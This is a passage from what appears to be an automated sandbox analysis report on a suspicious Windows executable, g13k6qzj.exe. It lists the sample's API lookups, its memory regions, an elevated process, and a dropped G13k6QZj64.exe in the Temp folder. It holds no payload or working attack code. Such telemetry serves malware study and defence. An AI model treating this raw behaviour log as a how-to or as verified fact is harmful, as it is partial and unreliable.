| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x752778f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75272db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75272da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75277a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x7527a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75279660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x7527a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x7527a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x752787c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75278840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75277940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75279560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x752869c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75286390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x752a1c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x752868e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75286920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75286540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x77ce5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77ce5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x752a26a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77cdda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x77cff190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x77cfa200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x752874f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75279fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75272d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x752775a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x752725e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75286870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x752868c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75286900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75279700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75271b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77d02570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75277920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77cf9920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x752862a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75286590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75286860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75279680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x752864a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x7527a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x752a28e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x7527a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75286020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x752777b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x7527fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75279a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75271ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75271da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75279930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x7527a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75278770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x7527fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75279fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75277910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75279a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75272dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75271d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75272b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x7527a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x7527a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x77cdbae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x752864f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x76a2ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x76a2fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x76a295e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x76a30680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x76a2ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x76a2f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x76a2ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x76a2ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x76a2f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x76a306c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x76a2efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x76a2f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x7516c6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x770aee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x770855a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x770857e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x77089590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x77080820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x770afbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x771638f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x7717b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x7717b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x77167740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x771774e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x7717efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x77184ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x77174580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x77171540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x748e1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x748e1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x748e1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x7527a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7527f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75277580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75279910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75286030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75285f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75285ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7527a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7527a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x77cd40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x77ccd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x77ccecf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75285720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x77cce140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x77cceb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77d09990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77d05540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77cf9dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7527a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x752a0a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x74fa0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7527f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x7527fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x752a1030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7527a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x752a14b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7527a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x752a16f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75279970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74f23c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75278710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x752796e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 1627-02-12 16:14:24 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #47: g13k6qzj.exe
175
0
| Information | Value |
|---|---|
| ID | #47 |
| File Name | c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe |
| Command Line | G13k6QZj.exe -accepteula "ImagingDevices.exe" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:07, Reason: Child Process |
| Unmonitor | End Time: 00:02:13, Reason: Self Terminated |
| Monitor Duration | 00:00:06 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x41c |
| Parent PID | 0xd04 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
C98
0x
EA0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001d0000 | 0x0028dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x002cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002d0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000340000 | 0x00340000 | 0x0034ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000360000 | 0x00360000 | 0x0036ffff | Private Memory | rw |
|
|
|
- |
| g13k6qzj.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0057ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000650000 | 0x00650000 | 0x0065ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000660000 | 0x00660000 | 0x0075ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000760000 | 0x00760000 | 0x008e7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000008f0000 | 0x008f0000 | 0x00a70fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000a80000 | 0x00a80000 | 0x01e7ffff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74680000 | 0x74711fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x748e0000 | 0x748e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x75160000 | 0x7521dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x753b0000 | 0x753f3fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75430000 | 0x767eefff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x76810000 | 0x7681efff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x77290000 | 0x772d3fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77340000 | 0x773ccfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x773f0000 | 0x778ccfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x77c30000 | 0x77c3bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ff8ee37ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75260000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x76a10000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x75160000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x77000000 |
|
1 | |
| Load | USER32.dll | base_address = 0x77150000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x748e0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x752860c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75286110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x752787e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75285f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75284a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75285fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x7527a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x7527c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75286300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75279a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x752861b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x7527fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77cf4f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75279a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x752779b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x7527fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x752792b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x7527a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75286180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75283a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75278cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75285f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75272af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x752778f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75272db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75272da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75277a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x7527a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75279660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x7527a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x7527a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x752787c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75278840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75277940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75279560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x752869c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75286390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x752a1c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x752868e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75286920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75286540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x77ce5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77ce5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x752a26a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77cdda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x77cff190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x77cfa200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x752874f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75279fa0 |
|
1 | |
